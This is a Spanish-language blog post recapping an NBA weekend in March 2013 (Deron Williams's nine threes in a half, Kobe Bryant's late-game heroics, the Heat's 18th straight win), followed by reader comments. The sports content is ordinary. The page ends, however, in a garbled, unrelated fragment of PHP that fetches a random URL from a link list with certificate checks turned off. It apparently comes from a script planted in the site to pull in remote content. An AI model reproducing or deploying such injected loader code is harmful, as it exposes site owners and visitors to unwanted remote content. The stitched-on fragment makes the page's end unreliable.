Informe del fin de semana: dentro Lakers, fuera Jazz y 18 para los Heat

11 de March de 2013 por MagicJohnson32

Amanece el lunes con los Lakers en posiciones de Playoffs a costa de los Jazz, con la racha de los Heat que alcanza ya las 18 victorias consecutivas, y con una jugada de la que se hablará durante días. Han sucedido muchas otras cosas de interés durante el fin de semana, y las detallamos pormenorizadamente a continuación:

VIERNES

Apenas habían arrancado los primeros partidos del fin de semana, y todo apuntaba ya a que Deron Williams se iba a convertir en el protagonista indiscutible de las crónicas. El base de los Nets anotó ante los Wizards 7 triples sin fallo en un suspiro y, aunque frenó el ritmo, a un minuto para el descanso logró el récord de triples en una mitad (9). Los 12 de Kobe Bryant y Donyell Marshall estaban al alcance de la mano, pero la segunda parte ‘sólo’ vio otros dos aciertos desde detrás de la línea por parte de D-Will, que dejó así su marca en 11 para un total de 42 puntos. ¿El partido? Paseo local (78-95) y puro trámite, salvo para Reggie Evans, que sólo entiende de trincheras y logró 11 puntos (5/16 tiros libres) y 24 rebotes.

Así pues, era difícil imaginar que alguien le discutiese el foco a Williams tras su gesta. La realidad es que la competición fue feroz e incluyó la 17ª victoria seguida de los Heat, la exhibición de Lillard en San Antonio, el triple ganador de Belinelli ante los Jazz y un nuevo capítulo en ese relato épico en que se ha convertido la campaña de Kobe Bryant.

kobe threeLo del escolta de los Lakers alcanza ya cotas inimaginables, incluso para lo que el #24 nos tiene acostumbrados. Tras sus históricos 42 puntos y 12 asistencias en la remontada en New Orleans, Bryant logró 41-12 (30-5 tras el descanso) ante los Raptors y forzó la prórroga con tres triples de locura. Sólo así, y después de que Bryant consiguiera el game winner en el tiempo extra, pudieron los Lakers superar al equipo canadiense, que llegó a disfrutar de una renta de 15 puntos ante la pésima defensa rival. Remaron Nash, Kobe y Howard, autores de los últimos 34 puntos de los Lakers, y Rudy Gay se encargó de fallar todo lo fallable para dar a Bryant la ocasión de erigirse en héroe una vez más (116-118).

La victoria de LAL volvió a combinarse con una derrota de los Jazz, otra vez perdedores en un final cruel (88-89). Marco Belinelli fue su verdugo el viernes, con un triple a 5 segundos para el final que fue lo mejor de un encuentro gris, Thibodeau style, en el que los Jazz sólo anotaron cinco puntos en los últimos seis minutos, todos a cargo de Jefferson. Estos resultados, combinados con la victoria de los Rockets en pista de los Warriors (94-88), apretaban todavía más la lucha por las últimas plazas de acceso a Playoffs en el Oeste. El de Oakland no fue el tipo de partido que esperábamos, con ambos equipos por debajo del 40% de acierto en tiros de campo. Parsons sigue consolidándose como material de estrella y gracias a él sobrevivieron los Rockets al 0 de 9 de Harden en tiros de 2 (aunque el barbas compensó con 3/8 triples, 11/14 libres y 11 asistencias).

Ajenos a todo esto permanecen los Heat, convertidos ya en favoritos para obtener el mejor balance de la fase regular y asegurarse así la ventaja de campo durante todos los Playoffs. Los Sixers plantaron cara en Miami, que ya es más de lo que esperábamos de ellos, pero los Heat dominaron el último cuarto, tal y como vienen haciendo de forma rutinaria, y se anotaron la 17ª victoria consecutiva (93-102). Los resultados del viernes convirtieron a los campeones vigentes en el equipo con menos derrotas de la liga, y todo gracias a un novato que ya tiene en el bolsillo el premio de RoY y a toda la ciudad de Portland. Damian Lillard destrozó a los Spurs en San Antonio y lideró la sorprendente paliza de los Blazers (136-106), en la que también brillaron Hickson, Aldridge y un Maynor que empieza a recordar al prometedor jugador que era antes de la lesión de rodilla.

Ante el tropiezo de los Spurs, los Thunder ya acechan y sorprendería no verlos al frente del Oeste en cuestión de días. El viernes aplastaron a los penosos Bobcats (116-94) sin apenas forzar la máquina y sin que ninguno de los titulares superase los 25 minutos. No andan lejos tampoco los Grizzlies, que siguen imparables y no necesitaron a Zach Randolph para despachar a los Cavs (103-92) en una excelente y completísima actuación de Marc Gasol (22-8-5-2).

JTerry HawksLos Mavs, por su parte, ganaron su partido en Detroit pese a desperdiciar una ventaja de 15 puntos en el último cuarto. Dos canastas consecutivas de Nowitzki y dos tiros libres de Collison después de que Villanueva pusiera a los Pistons por delante acabaron dando la victoria a los texanos (102-99). Algo similar vivieron los Celtics para superar en Boston a los Hawks, que fueron capaces de remontar 12 puntos en los últimos 6:30 y forzar la prórroga. En los 5 minutos extra, sin embargo, tres pérdidas de balón de Josh Smith y tres triples de los locales sentenciaron (102-107), de manera que ambos equipos quedaban igualados en sexta posición con un balance de 34-27. También en el Este, aunque más arriba, los Pacers reanudaron su buena marcha con una contundente victoria en Orlando (115-86), en la que los visitantes se impusieron en todos los cuartos por al menos 4 puntos. Paul George apenas necesitó 27 minutos para anotar 25 puntos.

Por último, en un partido tan insustancial como entretenido, los Kings vencieron a los Suns (112-121). La ausencia de defensas infló las estadísticas de muchos jugadores, entre los que destacaron Cousins (22-14-7), Thomas (27-5-6-5) o Dragic (17-4-16-5).

TOP 10 del viernes

SÁBADO

El sábado se inició con las noticias de la recaída de Amaré Stoudemire, que ha de volver al quirófano y se perderá alrededor de seis semanas. Horas después de hacerse público, y confirmada también la ausencia de Carmelo por tercer partido consecutivo, los Knicks recibieron a los Jazz en el Madison. El partido permaneció igualado durante los primeros quince minutos (29-31), momento a partir del cual los Jazz encajaron un parcial de 16-44. Sin Millsap, con problemas en la rodilla, ningún titular de Utah alcanzó las dobles figuras en anotación. JR Smith y Novak acribillaron el aro rival y devolvieron a los Knicks al empate con los Pacers por la segunda plaza del Este. Para Utah Jazz es la cuarta derrota seguida y su caída a plomo no encuentra freno.

Monta GSWAfortunadamente para el equipo de Salt Lake City, y para acabar de redondear la jornada para los Lakers, también perdieron los Rockets y los Warriors. Los texanos cedieron ante unos Suns serios y que últimamente ofrecen una imagen muy digna. El partido fue siempre igualado, con ventajas locales que no superaron los 11 puntos, y se llegó al último cuarto con el resultado en el aire. Jared Dudley estuvo excelente, pero el partido se resolvió en el duelo entre Harden y Dragic en el tramo final, en el que el esloveno fue mejor (105-107).

Igual que Dragic, otro que se vengó de su ex equipo fue Monta Ellis. De hecho, el triunfo de los Bucks en Oakland (103-93) hay que atribuirlo al trío Jennings-Ellis-Redick, quienes acumularon 72 puntos (25/46 en tiros), 10 rebotes y 22 asistencias. Los Warriors echaron en falta a Lee, baja por lesión, pese a que Carl Landry lo suplió de manera ejemplar, y cierran el fin de semana con dos derrotas en su cancha que cuestionan la solvencia del equipo ante el calendario teóricamente asequible que les resta.

En Atlanta se vivió otro encuentro con implicaciones directas en la clasificación. Los Nets encadenaron su tercera victoria seguida de manera convincente (93-80), sin grandes actuaciones individuales pero con una gran labor defensiva que secó casi todos los recursos de los Hawks, donde sólo Horford cumplió. Tampoco fue un festival anotador, por supuesto, el triunfo de los Grizzlies sobre los Hornets (85-96). Los 20 puntos y 18 rebotes de Anthony Davis encontraron la habitual réplica de Memphis en forma de una aportación colectiva, entre la que destacó Conley con 22 puntos, 8 asistencias y 3 robos.

Dos trámites completaron la madrugada. En el primero, los Wizards se deshicieron de los Bobcats (87-104) con 26 puntos y 10 rebotes de Trevor Ariza. Charlotte, tras empezar la temporada con 7 victorias en 12 partidos, ha perdido 45 de los 51 partidos siguientes, y Michael Dunlap, en su búsqueda desesperada de soluciones, llegó a probar anoche con McRoberts de titular en detrimento de Byron Mullens. El segundo trámite fue la derrota de los Wolves en Denver (88-111). Ty Lawson lo metió casi todo, Andre Miller dirigió la demoledora segunda unidad de los Nuggets, y los Wolves ya hicieron bastante aguantando hasta el descanso. Ricky se quedó sin robar un balón tras hacerlo 43 veces en los 10 partidos anteriores.

TOP 10 del sábado

DOMINGO

LeBron PacersY ya van 18. El Pacers-Heat no cumplió con las expectativas que lo rodeaban, básicamente por las decepcionantes actuaciones de Paul George y George Hill, y los campeones se anotaron con comodidad la décimo octava victoria consecutiva (91-105). A la aportación del Big Three de los Heat se le sumó Mario Chalmers, máximo anotador del encuentro con 26 puntos (5/6 triples). Miami logró un 56% de acierto en tiros de campo ante una de las mejores defensas de la liga y realmente empieza a asustar.

Thunder y Celtics abrieron fuego en Oklahoma con un encuentro -el primero de Jeff Green en esta pista como visitante- sin mucho brillo, donde pesaron más los errores que los aciertos. Boston se aferró al partido de manera admirable durante muchos minutos, con un enorme trabajo defensivo que mantuvo a Westbrook y Durant bajo control, dentro de lo razonable. Pero en la segunda mitad, y en especial en el último cuarto, los verdes apenas vieron aro y los Thunder no tuvieron que sufrir para anotarse una victoria (79-91) que les deja a un solo partido de los Spurs.

No muy diferente fue el encuentro que le siguió, con los Bulls imponiendo su estilo agrio y peleón en el Staples Center. Se jugó como manda Thibodeau, pero los Lakers no sólo lo aceptaron sino que lo aprovecharon para gravitar en torno a Dwight Howard. El pívot sigue dando muestras de mejoría (16 puntos, 21 rebotes y 4 tapones) y estuvo sensacional en el pick & roll. Lejos de las montañas rusas de los últimos partidos, los Lakers mandaron casi todo el encuentro y Kobe se pudo permitir un partido ‘humano’ (19 puntos, 7 rebotes, 9 asistencias). Con la ayuda de Nash, abrieron brecha en el tercer cuarto y sólo la pelea sin fin de Noah (18 puntos, 17 rebotes, 10 de ellos ofensivos) dilató la sentencia a favor de los Lakers (81-90), que de esta manera superan a los Jazz y se colocan en la octava posición del Oeste.

En su carrera a la desesperada por volver a meterse en la lucha por los Playoffs, Mavs y Blazers corrieron diferente suerte anoche. Dallas arrasó sin ninguna complicación a los Wolves, cuyo backcourt (Rubio, Ridnour, Barea, Shved) anotó únicamente 12 de 43 tiros de campo. Vince Carter fue el mejor del encuentro. Mucha más miga tuvo el Blazers-Hornets, que cayó del lado de New Orleans (96-98) en un final espectacular. Se llegó a los últimos 20 segundos con ventaja de un punto para Portland. Tras un fallo de Vásquez y rebote ofensivo de Anthony Davis, Ryan Anderson anotó un triple. A continuación, Damian Lillard respondió con otro triple a 11 segundos para el final. Y, a falta de un segundo, de nuevo Anderson anotó una canasta con tiro libre adicional para ganar el partido. Mavs y Blazers quedan así empatados a 3 partidos de las posiciones de Playoffs.

Volvemos al Este porque hay que prestar atención a los Bucks, que están a sólo dos partidos de la quinta plaza tras vencer en Sacramento (115-113) en su sexta victoria en siete encuentros. Milwaukee jugó sin Redick, Sanders e Ilyasova, pero aprovechó la descalificante a DeMarcus Cousins, que estaba brillando hasta que en el tercer cuarto propinó un codazo a Dunleavy. También estuvieron entretenidas las victorias de los Magic sobre los Sixers (91-99) y de los Raptors ante los Cavs (96-100). Cleveland echó en falta en el final de partido a Kyrie Irving, que tuvo que abandonar el parquet lesionado tras una falta de Valanciunas, y los Raptors, sin Rudy Gay pero con un gran Amir Johnson, se llevaron una ajustada victoria. Menos apretado fue el triunfo de los Magic ante Philadelphia, con venganza de Nikola Vucevic (14 puntos, 17 rebotes) y un Jameer Nelson muy superior a Holiday. Thaddeus Young es de lo poco que se salva por parte de los Sixers últimamente, y anoche volvió a ser el mejor de su equipo.

El fin de semana lo culminó la aplastante victoria de los Clippers sobre los Pistons (97-129), en la que Chris Paul y Griffin hicieron cuanto quisieron y los angelinos anotaron más del 60% de sus tiros. El protagonismo se lo quedó DeAndre Jordan con un mate en alleyoop que será una de las jugadas del año. No os la perdáis en el vídeo de abajo, donde obviamente aparece como la mejor jugada de la noche. Pobre Brandon Knight…

TOP 10 del domingo

Imágenes | AP Photos / Getty Images

Comenta

16 comentarios a esta entrada

  1. Esteban dice:
    #1

    wow si te vas un finde de vacaciones y vuelves no puedes dar cuenta de todo lo q te perdiste

    finalmente da la sensacon que los lakers clasificaran a PO, deben evitar al thunder si o si, frente a spurs y clippers, si bien van con las de perder, pueden dar peela, sobretodo ahora q ganan y esperan el regreso de pau que deberia hacerlkes dar el gran salto

    en el este esta todo bastante claro, las lesiones de granger, rose y amare/varios muchos jugadores de los NYK, nos privan de darle al heat algo mas de competencia para ganar su conferencia una pena

    los que se afianzan en el cuarto puesto y cuidado q vienen el alza, son los nets

    habra q ver quienes terminan 3eros y 4artos a fin de evitar al heat hasta la final

      Citar

  2. Jose Luis dice:
    #2

    Bueno, ese problema está más en el Oeste creo yo. En el Este, cuanto más arriba quedes mejor, el problema estará en la 5ª-6ª plaza, nadie querrá ser 5º. En el Oeste en cambio, los equipos lucharán por quedar fuera del alcance del Thunder me parece. Ahí sí que puede haber más baile, dependiendo de si el Thunder queda 1º o 2º y la pelea que tengan con los Spurs por el puesto de conferencia.

      Citar

  3. MagicJohnson32 dice:
    #3

    Joer, no me había dado cuenta del ladrillazo de crónica que he hecho, jaja. Quien se la lea entera (si es que hay alguien) se dará cuenta de que está escrita con mucho amor 😀

      Citar

  4. Jose Luis dice:
    #4

    se te veía contento jajajaja

      Citar

  5. max dice:
    #5

    Te la has currado mucho Magic!! Felicidades!

      Citar

  6. Esteban dice:
    #6

    Espacular magic, incribe trabajo habiendo tantos tantso partidos, felicitacions

      Citar

  7. Jose Luis dice:
    #7

    Magic se ha tomado la paciencia que tu no, Esteban jajajaja

    Muy de acuerdo con tu primer comentario, yo me voy de vacaciones en Semana Santa y lo que me perderé… Aunque intentaré estar atento como sea

      Citar

  8. Esteban dice:
    #8

    entre tanto y tanto, parece que simplemente se nos pierden de vista las 18 victorias del heat, o no le damos la trascendencia que merece

    hoy por hoy son el campeon indicutido nuevamente, asustan hasta al mismisimo thunder

    ojala que tenga alguna lesion o algo por el estilo, sino los PO del este seran sumamente aburridos, y la final de la liga sera tan demoledora como la del año pasado

      Citar

  9. Txusma dice:
    #9

    El próximo fin de semana podrías escribir la crónica en verso… 😀

    Solo un comentario pequeño, pequeñín. Sin haber visto el partido, nadie piensa que el primer triple estratosférico de Kobe frente los Raptors es para matarlo en caso de no meterlo? Es un bota, bota, bota; Howard parece quedarse con el pasillo abierto; pero bota, bota, bota; quedan 3 segundos de posesión; da igual, me la chupo como sea, y tiro… Lo dicho “pa matarlo”. Se lo permito pq es lo más parecido a Dios que he visto dsd que Dios se retiró…

      Citar

  10. rumbero dice:
    #10

    En la próxima que nos haga una valoración de como han estado las cheerleaders de cada equipo para elegir a las MVP y mayor coreografia en vano. No se como os lo hacéis a veces con tanto partido y tan poco tiempo (ya no sólo Magic pq si no recuerdo mal Simon por ejemplo es otro de los que suele tener crónicacon unos cuantos partidos. Yo con esta me he enterado que el partidazo que me suponía que había hecho Josh Smith lo acabó estropeando al final de mala manera (que malas decisiones toma a veces este chico) y de la última de Cousins. A este habrá que darlo por imposible. Cuanto talento desaprovechado…

    Esteban:
    ojala que tenga alguna lesion o algo por el estilo, sino los PO del este seran sumamente aburridos, y la final de la liga sera tan demoledora como la del año pasado

    No seas agorero hombre. A estos hay que verlos sanos para ver hasta donde son capaces de llegar. Y si alguien tiene que ganarlos que sea con todos los buenos en la pista

      Citar

  11. Esteban dice:
    #11

    hasta donde llega el heat quieres saber? hasta el bicampeonato como mucho, quiza con unops knicks mas en forma, rose en chicago o granger en lso pacers, habria cierta incertidumbre, pero el heat no solo es el mejor equipo de la conferencia, sino que ademas es el unico que no ha sufrido una lesion importante en un jugador importante es el propio heat,

    o sea, que no se pueden pedirle lesiones al heat pero todos los otros equipos competentes de la conferencia estan lesionados

      Citar

  12. MagicJohnson32 dice:
    #12

    Txusma:
    Solo un comentario pequeño, pequeñín. Sin haber visto el partido, nadie piensa que el primer triple estratosférico de Kobe frente los Raptors es para matarlo en caso de no meterlo? Es un bota, bota, bota; Howard parece quedarse con el pasillo abierto; pero bota, bota, bota; quedan 3 segundos de posesión; da igual, me la chupo como sea, y tiro… Lo dicho “pa matarlo”. Se lo permito pq es lo más parecido a Dios que he visto dsd que Dios se retiró…

    Pero hombre, que dio 12 asistencias, no estamos pasando ya, eh! :p

      Citar

  13. rumbero dice:
    #13

    Esteban:
    hasta donde llega el heat quieres saber? hasta el bicampeonato como mucho, quiza con unops knicks mas en forma, rose en chicago o granger en lso pacers, habria cierta incertidumbre, pero el heat no solo es el mejor equipo de la conferencia, sino que ademas es el unico que no ha sufrido una lesion importante en un jugador importante es el propio heat,

    o sea, que no se pueden pedirle lesiones al heat pero todos los otros equipos competentes de la conferencia estan lesionados

    Al bicampeonato como mínimo. Yo lo que digo es que a un equipo que puede dominar la liga durante los próximos años hay que verlo sano y en su máxima plenitud para ver hasta donde llega.
    Y lo de las lesiones tiene un punto de suerte y otro de trabajo bien hecho. Estás hablando que se lesionen Wade o Lebron básicamente. Al primero le recomendaron que se operara la rodilla después de las finales de la temporada y parece que les ha salido muy bien y James igual si un día le cae un meteorito encima se hace un esguince.

      Citar

  14. MagicJohnson32 dice:
    #14

    rumbero: Al bicampeonato como mínimo. Yo lo que digo es que a un equipo que puede dominar la liga durante los próximos años hay que verlo sano y en su máxima plenitud para ver hasta donde llega.
    Y lo de las lesiones tieneun punto de suerte y otro de trabajo bien hecho. Estás hablando que se lesionen Wade o Lebron básicamente. Al primero le recomendaron que se operara la rodilla después de las finales de la temporada y parece que les ha salido muy bieny James igual si un día le cae un meteorito encima se hace un esguince.

    El esguince se lo haría el meteorito, y encima LeBron le haría un mate en la cara.

      Citar

  15. MagicJohnson32 dice:
    #15

    rumbero:
    En la próxima que nos haga una valoración de como han estado las cheerleaders de cada equipo para elegir a las MVP y mayor coreografia en vano.

    “mayor coreografía en vano” 😀 Qué crack…

      Citar

  16. txusma dice:
    #16

    MagicJohnson32: Pero hombre, que dio 12 asistencias, no estamos pasando ya, eh! :p

    Yo no he hablado del partido, sólo de esa jugada en particular. Ya sabes que no soy el más beligerante contra Kobe. 😉

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>